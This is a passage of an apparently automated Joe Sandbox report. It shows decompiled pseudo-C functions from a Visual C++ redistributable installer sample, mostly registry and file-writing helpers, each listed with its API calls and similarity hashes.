                                                                          						}
                                                                          						_v8 = (_v16 >> 1) + 1;
                                                                          						_t65 = E00011EDE(_t64, (_v16 >> 1) + 1);
                                                                          						if(_t65 < 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_t60 = RegQueryValueExW(_a4, _a8, 0,  &_v12,  *_t64,  &_v16);
                                                                          						goto L9;
                                                                          					}
                                                                          					goto L4;
                                                                          				}
                                                                          			}














                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00050FE4
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0005101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 3660427363-955085611
                                                                          • Opcode ID: 9a31ba54e1014d4bb7f8b8da50a3817e53ffb66bd57ce75ad751fd7eb20c02ec
                                                                          • Instruction ID: d4375f1ee823f9c8cfd0234e077116e15000a4ad7ead2f83081ee114c25880ad
                                                                          • Opcode Fuzzy Hash: 9a31ba54e1014d4bb7f8b8da50a3817e53ffb66bd57ce75ad751fd7eb20c02ec
                                                                          • Instruction Fuzzy Hash: A741AE35D0022AEFDF209E94C885AEFBBB9EF44311F104169ED14A7290D7719E95CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E00058E07(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                          				char _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				void* __ebx;
                                                                          				void* _t60;
                                                                          				void* _t61;
                                                                          
                                                                          				_t57 = __ecx;
                                                                          				_v24 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_t61 = E00058CFB(__ecx, _a8,  &_v24);
                                                                          				if(_t61 >= 0) {
                                                                          					_t61 = E00050E3F(_a4, _v24, 0x20019,  &_v16);
                                                                          					if(_t61 >= 0) {
                                                                          						_t61 = E00050E3F(_v16,  *0x7a7e4, 0x20019,  &_v12);
                                                                          						if(_t61 == 0x80070002) {
                                                                          							L12:
                                                                          							_t61 = 0;
                                                                          						} else {
                                                                          							if(_t61 >= 0) {
                                                                          								_t60 = 0;
                                                                          								_push( &_v8);
                                                                          								_push(0);
                                                                          								while(1) {
                                                                          									_push(_v12);
                                                                          									_t61 = E00050D1C(_t57);
                                                                          									if(_t61 == 0x80070103) {
                                                                          										goto L12;
                                                                          									}
                                                                          									if(_t61 >= 0) {
                                                                          										_t61 = E000554A3(_t57, _a16, _v8);
                                                                          										if(_t61 != 0x80070490) {
                                                                          											L9:
                                                                          											if(_t61 >= 0) {
                                                                          												_t60 = _t60 + 1;
                                                                          												_push( &_v8);
                                                                          												_push(_t60);
                                                                          												continue;
                                                                          											}
                                                                          										} else {
                                                                          											_t61 = E00058D7F(0, _t57, _a4, _v8,  &_v20);
                                                                          											if(_t61 >= 0) {
                                                                          												_t61 = E00058F31(_a20, _a24, _v8, _v20);
                                                                          												goto L9;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          									goto L13;
                                                                          								}
                                                                          								goto L12;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				L13:
                                                                          				if(_v20 != 0) {
                                                                          					E000554EF(_v20);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					RegCloseKey(_v12);
                                                                          					_v12 = 0;
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					RegCloseKey(_v16);
                                                                          					_v16 = 0;
                                                                          				}
                                                                          				if(_v24 != 0) {
                                                                          					E000554EF(_v24);
                                                                          				}
                                                                          				return _t61;
                                                                          			}












                                                                          APIs
                                                                            • Part of subcall function 00058CFB: lstrlenW.KERNEL32(00000100,?,?,00059098,000002C0,00000100,00000100,00000100,?,?,?,00037B40,?,?,000001BC,00000000), ref: 00058D1B
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0005B4F0,wininet.dll,?), ref: 00058F07
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0005B4F0,wininet.dll,?), ref: 00058F14
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                            • Part of subcall function 00050D1C: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00038BD8), ref: 00050D77
                                                                            • Part of subcall function 00050D1C: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00038BD8,00000000), ref: 00050D99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                          • String ID: wininet.dll
                                                                          • API String ID: 2680864210-3354682871
                                                                          • Opcode ID: 32ee1b3b55d2841c954d33ccad309453e68ef89da7c59b6319d85b53b2d42ec2
                                                                          • Instruction ID: dc4f037221cac7266d3fc1e4b7855cba7ae725a148345bf5721f19a89ec7c86b
                                                                          • Opcode Fuzzy Hash: 32ee1b3b55d2841c954d33ccad309453e68ef89da7c59b6319d85b53b2d42ec2
                                                                          • Instruction Fuzzy Hash: A6311876C0112DAFCF21AF94CC428EFBBBAEB44352B558169ED0176122DB315E58DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00059220(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				void* _t55;
                                                                          				void* _t58;
                                                                          
                                                                          				_t55 = __edx;
                                                                          				_t54 = __ecx;
                                                                          				_v20 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v24 = 0;
                                                                          				_t58 = E00058CFB(__ecx, _a8,  &_v20);
                                                                          				if(_t58 >= 0) {
                                                                          					_t58 = E00050AD5(__ecx, _a4, _v20, 0x20006, 0, 0,  &_v12,  &_v24);
                                                                          					if(_t58 >= 0) {
                                                                          						_push(_a12);
                                                                          						_t58 = E00011F20( &_v16, L"%ls\\%ls",  *0x7a7e4);
                                                                          						if(_t58 >= 0) {
                                                                          							_t58 = E00050AD5(_t54, _v12, _v16, 0x20006, 0, 0,  &_v8,  &_v24);
                                                                          							if(_t58 >= 0) {
                                                                          								_t58 = E00051392(_t54, _t55, _v8,  *0x7a7d4, _a16);
                                                                          								if(_t58 >= 0) {
                                                                          									_t58 = E00051392(_t54, _t55, _v8,  *0x7a7d8, _a20);
                                                                          									if(_t58 >= 0 && _a24 != 0) {
                                                                          										_t58 = E00051344(_v8,  *0x7a7dc, _a24);
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          					_v8 = 0;
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					RegCloseKey(_v12);
                                                                          					_v12 = 0;
                                                                          				}
                                                                          				if(_v20 != 0) {
                                                                          					E000554EF(_v20);
                                                                          				}
                                                                          				return _t58;
                                                                          			}











                                                                          APIs
                                                                            • Part of subcall function 00058CFB: lstrlenW.KERNEL32(00000100,?,?,00059098,000002C0,00000100,00000100,00000100,?,?,?,00037B40,?,?,000001BC,00000000), ref: 00058D1B
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000), ref: 00059305
                                                                          • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 0005931F
                                                                            • Part of subcall function 00050AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,00020491,?,00000000,00020006), ref: 00050AFA
                                                                            • Part of subcall function 00051392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                            • Part of subcall function 00051392: RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006,0A79F685,00020006,00020006,00000000,?,?,?), ref: 000513F5
                                                                            • Part of subcall function 00051344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Close$CreateDeletelstrlen
                                                                          • String ID: %ls\%ls
                                                                          • API String ID: 3924016894-2125769799
                                                                          • Opcode ID: 1edcd6e9082bb4c34b3f955374626497deb7d498ba9ca9dcc838c8876fc226f6
                                                                          • Instruction ID: c5a4cf2cff20749473fd73fc1fcba74b2c1936293765c7996a4a1b2d5961f0e1
                                                                          • Opcode Fuzzy Hash: 1edcd6e9082bb4c34b3f955374626497deb7d498ba9ca9dcc838c8876fc226f6
                                                                          • Instruction Fuzzy Hash: 3E31F772C0112EFBCF129F94CC818EFBBB9EF04352F05416AAE04B2121D7368E54AB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E0004CD32(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char _v10;
                                                                          				void _v5128;
                                                                          				intOrPtr _v5132;
                                                                          				long _v5136;
                                                                          				void* _v5140;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t29;
                                                                          				intOrPtr _t35;
                                                                          				long _t43;
                                                                          				signed int _t44;
                                                                          				signed short* _t47;
                                                                          				void* _t48;
                                                                          				void* _t52;
                                                                          				signed int* _t57;
                                                                          				long _t59;
                                                                          				void* _t60;
                                                                          				intOrPtr* _t62;
                                                                          				void* _t63;
                                                                          				signed int _t64;
                                                                          
                                                                          				E00059F00();
                                                                          				_t29 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t29 ^ _t64;
                                                                          				_t49 = _a8;
                                                                          				_t47 = _a12;
                                                                          				_t62 = _a4;
                                                                          				_t52 =  *( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_t49 & 0x0000003f) * 0x30);
                                                                          				_t35 = _a16 + _t47;
                                                                          				_v5140 = _t52;
                                                                          				_v5132 = _t35;
                                                                          				 *_t62 = 0;
                                                                          				 *((intOrPtr*)(_t62 + 4)) = 0;
                                                                          				 *((intOrPtr*)(_t62 + 8)) = 0;
                                                                          				while(_t47 < _t35) {
                                                                          					_t57 =  &_v5128;
                                                                          					while(_t47 < _t35) {
                                                                          						_t44 =  *_t47 & 0x0000ffff;
                                                                          						_t47 =  &(_t47[1]);
                                                                          						if(_t44 == 0xa) {
                                                                          							 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t62 + 8)) + 2;
                                                                          							_push(0xd);
                                                                          							_pop(0);
                                                                          							 *_t57 = 0;
                                                                          							_t57 =  &(_t57[0]);
                                                                          						}
                                                                          						 *_t57 = _t44;
                                                                          						_t57 =  &(_t57[0]);
                                                                          						_t35 = _v5132;
                                                                          						if(_t57 <  &_v10) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					_t59 = _t57 -  &_v5128 & 0xfffffffe;
                                                                          					if(WriteFile(_t52,  &_v5128, _t59,  &_v5136, 0) == 0) {
                                                                          						 *_t62 = GetLastError();
                                                                          					} else {
                                                                          						_t43 = _v5136;
                                                                          						 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t62 + 4)) + _t43;
                                                                          						if(_t43 >= _t59) {
                                                                          							_t35 = _v5132;
                                                                          							_t52 = _v5140;
                                                                          							continue;
                                                                          						}
                                                                          					}
                                                                          					L12:
                                                                          					_pop(_t60);
                                                                          					_pop(_t63);
                                                                          					_pop(_t48);
                                                                          					return E0003DE36(_t48, _v8 ^ _t64, 0, _t60, _t63);
                                                                          				}
                                                                          				goto L12;
                                                                          			}


                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0004D16F,?,00000000,?,00000000,00000000), ref: 0004CDDC
                                                                          • GetLastError.KERNEL32(?,0004D16F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CE05
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 442123175-2381362037
                                                                          • Opcode ID: 5aa21b879edd6217e9eba9a0017b5f2c4fb64f877250542169ef980f149b2113
                                                                          • Instruction ID: b150b56fddbafc265ed04e6472b98c4a525fffe2ac2f9a3586bbcaba58151b41
                                                                          • Opcode Fuzzy Hash: 5aa21b879edd6217e9eba9a0017b5f2c4fb64f877250542169ef980f149b2113
                                                                          • Instruction Fuzzy Hash: 8E319E71A012199BDB64CF6ACC809DAB7F9FF88311F2484BAE50AD7250E730AD85CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E0004CC53(signed int* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				char _v9;
                                                                          				void _v5128;
                                                                          				intOrPtr _v5132;
                                                                          				long _v5136;
                                                                          				void* _v5140;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t31;
                                                                          				intOrPtr _t37;
                                                                          				long _t45;
                                                                          				char _t46;
                                                                          				intOrPtr* _t49;
                                                                          				void* _t50;
                                                                          				void* _t54;
                                                                          				void* _t57;
                                                                          				char* _t59;
                                                                          				long _t60;
                                                                          				void* _t61;
                                                                          				signed int* _t63;
                                                                          				void* _t64;
                                                                          				signed int _t65;
                                                                          
                                                                          				E00059F00();
                                                                          				_t31 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t31 ^ _t65;
                                                                          				_t51 = _a8;
                                                                          				_t49 = _a12;
                                                                          				_t63 = _a4;
                                                                          				_t54 =  *( *((intOrPtr*)(0x7b158 + (_a8 >> 6) * 4)) + 0x18 + (_t51 & 0x0000003f) * 0x30);
                                                                          				 *_t63 =  *_t63 & 0x00000000;
                                                                          				_t37 = _a16 + _t49;
                                                                          				_t63[1] = _t63[1] & 0x00000000;
                                                                          				_t63[2] = _t63[2] & 0x00000000;
                                                                          				_v5140 = _t54;
                                                                          				_v5132 = _t37;
                                                                          				while(_t49 < _t37) {
                                                                          					_t59 =  &_v5128;
                                                                          					while(_t49 < _t37) {
                                                                          						_t46 =  *_t49;
                                                                          						_t49 = _t49 + 1;
                                                                          						if(_t46 == 0xa) {
                                                                          							_t63[2] = _t63[2] + 1;
                                                                          							 *_t59 = 0xd;
                                                                          							_t59 = _t59 + 1;
                                                                          						}
                                                                          						 *_t59 = _t46;
                                                                          						_t59 = _t59 + 1;
                                                                          						_t37 = _v5132;
                                                                          						if(_t59 <  &_v9) {
                                                                          							continue;
                                                                          						}
                                                                          						break;
                                                                          					}
                                                                          					_t60 = _t59 -  &_v5128;
                                                                          					if(WriteFile(_t54,  &_v5128, _t60,  &_v5136, 0) == 0) {
                                                                          						 *_t63 = GetLastError();
                                                                          					} else {
                                                                          						_t45 = _v5136;
                                                                          						_t63[1] = _t63[1] + _t45;
                                                                          						if(_t45 >= _t60) {
                                                                          							_t37 = _v5132;
                                                                          							_t54 = _v5140;
                                                                          							continue;
                                                                          						}
                                                                          					}
                                                                          					L12:
                                                                          					_pop(_t61);
                                                                          					_pop(_t64);
                                                                          					_pop(_t50);
                                                                          					return E0003DE36(_t50, _v8 ^ _t65, _t57, _t61, _t64);
                                                                          				}
                                                                          				goto L12;
                                                                          			}


                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0004D18F,?,00000000,?,00000000,00000000), ref: 0004CCEE
                                                                          • GetLastError.KERNEL32(?,0004D18F,?,00000000,?,00000000,00000000,?,00000000), ref: 0004CD17
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met
                                                                          • API String ID: 442123175-2381362037
                                                                          • Opcode ID: be318af010b24304f273b67dee2d50aefe718dff5c9194982de54da26f2b7287
                                                                          • Instruction ID: 3a7f32b9f62f27294feac4bfd15b9cee0afc15d594dba1c5968adef9f01c4c30
                                                                          • Opcode Fuzzy Hash: be318af010b24304f273b67dee2d50aefe718dff5c9194982de54da26f2b7287
                                                                          • Instruction Fuzzy Hash: 7F21B175A002199FDB24CF69CC84BEAB7F8FB48342F1044BAE94AD7251D730AD85CB14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000139CF(void* __ecx, signed int* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
                                                                          				intOrPtr _v8;
                                                                          				void* __edi;
                                                                          				void* _t21;
                                                                          				intOrPtr _t22;
                                                                          				signed int _t24;
                                                                          				void* _t30;
                                                                          				signed int _t32;
                                                                          				intOrPtr _t35;
                                                                          				signed int _t44;
                                                                          				signed int _t46;
                                                                          				void* _t49;
                                                                          				signed int _t51;
                                                                          				void* _t53;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t46 = _a12;
                                                                          				if(_t46 != 0) {
                                                                          					_t51 = _a20;
                                                                          					_t30 = _a16 + _t46;
                                                                          					_t22 = E000138F6(_t21, __ecx, _a4, _t30, _t51, _a24);
                                                                          					_v8 = _t22;
                                                                          					if(_t22 >= 0) {
                                                                          						_t44 =  *_a4;
                                                                          						_t8 = _t30 - 1; // 0x5b48f
                                                                          						_t24 = _t8;
                                                                          						_t32 = _a8;
                                                                          						_a20 = _t44;
                                                                          						if(_t24 > _t32) {
                                                                          							_a24 = _t24 * _t51 + _t44;
                                                                          							_t12 = _t24 - 1; // 0x5b48e
                                                                          							_t42 = _t12 * _t51 + _t44;
                                                                          							_t35 = _a24;
                                                                          							_t49 = _t24 - _t32;
                                                                          							_a4 = _t12 * _t51 + _t44;
                                                                          							do {
                                                                          								E00031664(_t35, _t51, _t42, _t51);
                                                                          								_t53 = _t53 + 0x10;
                                                                          								_t42 = _a4 - _t51;
                                                                          								_t35 = _t35 - _t51;
                                                                          								_a4 = _a4 - _t51;
                                                                          								_t49 = _t49 - 1;
                                                                          							} while (_t49 != 0);
                                                                          							_t46 = _a12;
                                                                          							_t32 = _a8;
                                                                          							_t44 = _a20;
                                                                          						}
                                                                          						E0003F670(_t46 * _t51, _t32 * _t51 + _t44, 0, _t46 * _t51);
                                                                          						_t22 = _v8;
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = 0;
                                                                          				}
                                                                          				return _t22;
                                                                          			}

















                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s
                                                                          • String ID: crypt32.dll$wininet.dll
                                                                          • API String ID: 2001391462-82500532
                                                                          • Opcode ID: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
                                                                          • Instruction ID: 522560e8100ade6fa540055e5737cbaa9ab37554ef224a376b0f8827d40bc2cf
                                                                          • Opcode Fuzzy Hash: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
                                                                          • Instruction Fuzzy Hash: 87115E71600219AFCF08DF69CDD69EFBF69EF98254B14812AFD094B311D631EA508AE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E00051392(void* __ecx, void* __edx, void* _a4, short* _a8, char* _a12) {
                                                                          				signed int _v8;
                                                                          				signed short _t12;
                                                                          				void* _t14;
                                                                          				signed short _t18;
                                                                          				signed short _t22;
                                                                          
                                                                          				_t22 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				if(_a12 == 0) {
                                                                          					_t12 = RegDeleteValueW(_a4, _a8);
                                                                          					if(_t12 == 2 || _t12 == 3) {
                                                                          						_t12 = 0;
                                                                          					}
                                                                          					if(_t12 != 0) {
                                                                          						_t26 =  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
                                                                          						_t14 = 0x80004005;
                                                                          						_t22 =  >=  ? 0x80004005 :  <=  ? _t12 : _t12 & 0x0000ffff | 0x80070000;
                                                                          						_push(_t22);
                                                                          						_push(0x2fe);
                                                                          						goto L9;
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = E00050A2B(_a12, 0xffffffff,  &_v8);
                                                                          					if(_t22 >= 0) {
                                                                          						_t18 = RegSetValueExW(_a4, _a8, 0, 1, _a12, _v8);
                                                                          						if(_t18 != 0) {
                                                                          							_t29 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          							_t14 = 0x80004005;
                                                                          							_t22 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t22);
                                                                          							_push(0x2f5);
                                                                          							L9:
                                                                          							_push("regutil.cpp");
                                                                          							E000137D3(_t14);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t22;
                                                                          			}









                                                                          APIs
                                                                          • RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                          • RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006,0A79F685,00020006,00020006,00000000,?,?,?), ref: 000513F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Delete
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 1738766685-955085611
                                                                          • Opcode ID: 19745d0869e0b933f38c049512af172f4472f6102fc504588220ba6c8902d11b
                                                                          • Instruction ID: 08cba929969813c259ca3b5793b2c522ca6a10626f04ea1e1668f65b4feacf42
                                                                          • Opcode Fuzzy Hash: 19745d0869e0b933f38c049512af172f4472f6102fc504588220ba6c8902d11b
                                                                          • Instruction Fuzzy Hash: 3211C636E00636BBEF215EA98C04FEB76E9EF04752F014221FE14EA1A0D775CD509AD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E0001DCA5(signed int _a4, short* _a8, intOrPtr _a12) {
                                                                          				signed int _t15;
                                                                          				signed int _t21;
                                                                          				intOrPtr _t22;
                                                                          				intOrPtr _t23;
                                                                          				short** _t26;
                                                                          				void* _t27;
                                                                          
                                                                          				_t15 = _a4;
                                                                          				_t23 =  *((intOrPtr*)(_t15 + 0x8c));
                                                                          				_t26 = 0;
                                                                          				_t22 = 0;
                                                                          				_t27 = 0x80070490;
                                                                          				if(_t23 != 2) {
                                                                          					if(_t23 == 3) {
                                                                          						_t26 =  *(_t15 + 0x9c);
                                                                          						_t22 =  *((intOrPtr*)(_t15 + 0xa0));
                                                                          					}
                                                                          				} else {
                                                                          					_t26 =  *(_t15 + 0xb4);
                                                                          					_t22 =  *((intOrPtr*)(_t15 + 0xb8));
                                                                          				}
                                                                          				_a4 = _a4 & 0x00000000;
                                                                          				if(_t22 == 0) {
                                                                          					L12:
                                                                          					return _t27;
                                                                          				} else {
                                                                          					while(CompareStringW(0, 0,  *_t26, 0xffffffff, _a8, 0xffffffff) != 2) {
                                                                          						_t26 =  &(_t26[3]);
                                                                          						_t21 = _a4 + 1;
                                                                          						_a4 = _t21;
                                                                          						if(_t21 < _t22) {
                                                                          							continue;
                                                                          						}
                                                                          						goto L12;
                                                                          					}
                                                                          					if(_a12 == 0) {
                                                                          						L11:
                                                                          						_t27 = 0;
                                                                          						goto L12;
                                                                          					}
                                                                          					_t27 = E000121A5(_a12, _t26[1], 0);
                                                                          					if(_t27 >= 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					_push("Failed to copy the property value.");
                                                                          					_push(_t27);
                                                                          					E0005012F();
                                                                          					goto L12;
                                                                          				}
                                                                          			}










                                                                          APIs
